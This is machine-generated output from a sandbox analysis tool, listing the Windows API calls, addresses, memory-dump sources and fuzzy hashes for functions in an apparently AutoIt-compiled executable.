                                                        • Opcode ID: 5afb4296e495432303ae43611b419d3d006baa3f3ad06c5d3f7c83f42751c638
                                                        • Instruction ID: 66828b2bc2f76b4f505a70a76d7a190a0a0e325bd47f283f159a43457dfef0c9
                                                        • Opcode Fuzzy Hash: 5afb4296e495432303ae43611b419d3d006baa3f3ad06c5d3f7c83f42751c638
                                                        • Instruction Fuzzy Hash: 5A31C071500219EBDF18CFA8E94CADE7BB5EF05315F10822AF925E72E0C7B09994DB90
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0011B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0011B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0011B259
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0011B27F
                                                        • _wcsstr.LIBCMT ref: 0011B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: 8e6e181792f63048c50432c778a60b316b81f5478be22de416f45ac2a04f4161
                                                        • Instruction ID: b84021cee6c958f3a14c5c28aecf7db46532af1e83ad491b979ecdadc86389c3
                                                        • Opcode Fuzzy Hash: 8e6e181792f63048c50432c778a60b316b81f5478be22de416f45ac2a04f4161
                                                        • Instruction Fuzzy Hash: FA21D7712082407BEB295B759C89EBF7B9CDF4A750F11413DF805DA1A2EFB1EC819660
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014B192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0014B1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0014B1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 0014B1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00130E90,00000000), ref: 0014B216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 78b6d3a8ba5438b7bff46967f28ae689eb0296f00e21cf98f6830f63239b98bc
                                                        • Instruction ID: 625ae69949a6f898c5604b3ec2b7ddf7178b41338a4442b96d5a01d584a786ea
                                                        • Opcode Fuzzy Hash: 78b6d3a8ba5438b7bff46967f28ae689eb0296f00e21cf98f6830f63239b98bc
                                                        • Instruction Fuzzy Hash: 4B21B171918651AFCB149F389C84A6A3BA5FB06721F114728F932D76F0D730E9618B90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00119320
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00119352
                                                        • __itow.LIBCMT ref: 0011936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00119392
                                                        • __itow.LIBCMT ref: 001193A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 3232d3ac1bba0bb120c3ab4b700771e6c9b73594faf05704f5da9a41dd38631f
                                                        • Instruction ID: 324efb9f2a92f9ee44106791ea0f2bf70dc9f16bbc69163377c6efdb862cb9fd
                                                        • Opcode Fuzzy Hash: 3232d3ac1bba0bb120c3ab4b700771e6c9b73594faf05704f5da9a41dd38631f
                                                        • Instruction Fuzzy Hash: 42213430701208BBDB15AB758C99EEE7BA8FB49720F044039F928EB2D1D7B08D818791
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00135A6E
                                                        • GetForegroundWindow.USER32 ref: 00135A85
                                                        • GetDC.USER32(00000000), ref: 00135AC1
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00135ACD
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00135B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 9a974424cb2ccaca4c9fa16b747970297786f4cfab3a3c0542399a56e6a6e930
                                                        • Instruction ID: e28968cee380409d3b5ec3304f7027cdeda09572342052f9ce45339b3c57cf24
                                                        • Opcode Fuzzy Hash: 9a974424cb2ccaca4c9fa16b747970297786f4cfab3a3c0542399a56e6a6e930
                                                        • Instruction Fuzzy Hash: D521A139A00104AFDB04EF64DC89AAABBE5EF49710F15807DF80997762CB30AC41CB90
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000C134D
                                                        • SelectObject.GDI32(?,00000000), ref: 000C135C
                                                        • BeginPath.GDI32(?), ref: 000C1373
                                                        • SelectObject.GDI32(?,00000000), ref: 000C139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: ad6aa765875d5fcf493d89036328dcec9a11ae3fbab56f44a86e0188d25ed8c6
                                                        • Instruction ID: 07d26072d4d878346ac5dfebdf604f0e8d89a3cba442e593f434a734ae8e3b18
                                                        • Opcode Fuzzy Hash: ad6aa765875d5fcf493d89036328dcec9a11ae3fbab56f44a86e0188d25ed8c6
                                                        • Instruction Fuzzy Hash: 46214134800648EFDB119F66DC48BAD7BEAFB02725F14421BF810969B1D7719AD2DF90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 0a932bfdd43947b9c1a53ec2b277ae8cb86913bd4a72f9112e245c4ca35465b6
                                                        • Instruction ID: e175180495f65d050a57f5e87362ffb3388ab40c7cc6cf98a0a7d2b6eb9f7d45
                                                        • Opcode Fuzzy Hash: 0a932bfdd43947b9c1a53ec2b277ae8cb86913bd4a72f9112e245c4ca35465b6
                                                        • Instruction Fuzzy Hash: 3F0192B3608109BBD60C6A126D82FFBB35CDF61398B044035FD15AA383EB71DE5492E1
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00124ABA
                                                        • __beginthreadex.LIBCMT ref: 00124AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00124AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00124B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00124B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 660fc23eb6da44af280838c9a7d21f209ecb97f20c39f6621b8ddb1bb1ec8b64
                                                        • Instruction ID: 185a5a15b8c2646d2b88d96cbd5892e0413c1cd5627c1887738b750091d9aea3
                                                        • Opcode Fuzzy Hash: 660fc23eb6da44af280838c9a7d21f209ecb97f20c39f6621b8ddb1bb1ec8b64
                                                        • Instruction Fuzzy Hash: AC110876904258FBC7108FA8AC08A9B7FADEB45320F144269F814D3760D771C9548BA1
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0011821E
                                                        • GetLastError.KERNEL32(?,00117CE2,?,?,?), ref: 00118228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00117CE2,?,?,?), ref: 00118237
                                                        • HeapAlloc.KERNEL32(00000000,?,00117CE2,?,?,?), ref: 0011823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00118255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 28d8c3b06bf801348f4c521ccd7af7f09cbc0c17a55e0078fdfe15ba3a3ad674
                                                        • Instruction ID: 8cd7940907fdb3649e9ecdd71de1372425749a1e48b7cac3fc346cba78a1b27a
                                                        • Opcode Fuzzy Hash: 28d8c3b06bf801348f4c521ccd7af7f09cbc0c17a55e0078fdfe15ba3a3ad674
                                                        • Instruction Fuzzy Hash: 29016979200208BFDB254FA6DC48DAB7BACEF8B754B60443DFD09C2220DB318C81CA60
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?,?,00117455), ref: 00117127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?), ref: 00117160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 0011716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00125260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0012526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00125276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00125280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00118121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0011812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0011813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00118141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00118157
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0011C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0011C20E
                                                        • MessageBeep.USER32(00000000), ref: 0011C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0011C242
                                                        • EndDialog.USER32(?,00000001), ref: 0011C25C
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 000C13BF
                                                        • StrokeAndFillPath.GDI32(?,?,000FB888,00000000,?), ref: 000C13DB
                                                        • SelectObject.GDI32(?,00000000), ref: 000C13EE
                                                        • DeleteObject.GDI32 ref: 000C1401
                                                        • StrokePath.GDI32(?), ref: 000C141C
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        APIs
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 000C7A51: _memmove.LIBCMT ref: 000C7AAB
                                                        • __swprintf.LIBCMT ref: 000D2ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000D2D66
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        APIs
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                        • CoInitialize.OLE32(00000000), ref: 0012B9BB
                                                        • CoCreateInstance.OLE32(00152D6C,00000000,00000001,00152BDC,?), ref: 0012B9D4
                                                        • CoUninitialize.OLE32 ref: 0012B9F1
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 000E50AD
                                                          • Part of subcall function 000F00F0: __87except.LIBCMT ref: 000F012B
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3c$_
                                                        • API String ID: 4104443479-867841958
                                                        APIs
                                                          • Part of subcall function 001214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00119296,?,?,00000034,00000800,?,00000034), ref: 001214E6
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0011983F
                                                          • Part of subcall function 00121487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 001214B1
                                                          • Part of subcall function 001213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00121409
                                                          • Part of subcall function 001213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0011925A,00000034,?,?,00001004,00000000,00000000), ref: 00121419
                                                          • Part of subcall function 001213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0011925A,00000034,?,?,00001004,00000000,00000000), ref: 0012142F
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001198AC
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001198F9
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0014F910,00000000,?,?,?,?), ref: 001479DF
                                                        • GetWindowLongW.USER32 ref: 001479FC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00147A0C
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00147461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00147475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00147499
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00147C4A
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00147C58
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00147C5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00146D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00146D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00146D70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00147772
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00147787
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00147794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4BD0,?,000C4DEF,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4B83,?), ref: 000C4C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00141039), ref: 00140DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00140E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00138CF4,?,0014F910), ref: 001390EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00139100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 0013E0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 0013E101
                                                          • Part of subcall function 0013D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0013D7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0013E301
                                                        • _memmove.LIBCMT ref: 0013E314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 001380C3
                                                        • CoUninitialize.OLE32 ref: 001380CE
                                                          • Part of subcall function 0011D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0011D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 001380D9
                                                        • VariantClear.OLEAUT32(?), ref: 001383AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00152C7C,?), ref: 001176EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00152C7C,?), ref: 00117702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0014FB80,000000FF,?,00000000,00000800,00000000,?,00152C7C,?), ref: 00117727
                                                        • _memcmp.LIBCMT ref: 00117748
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
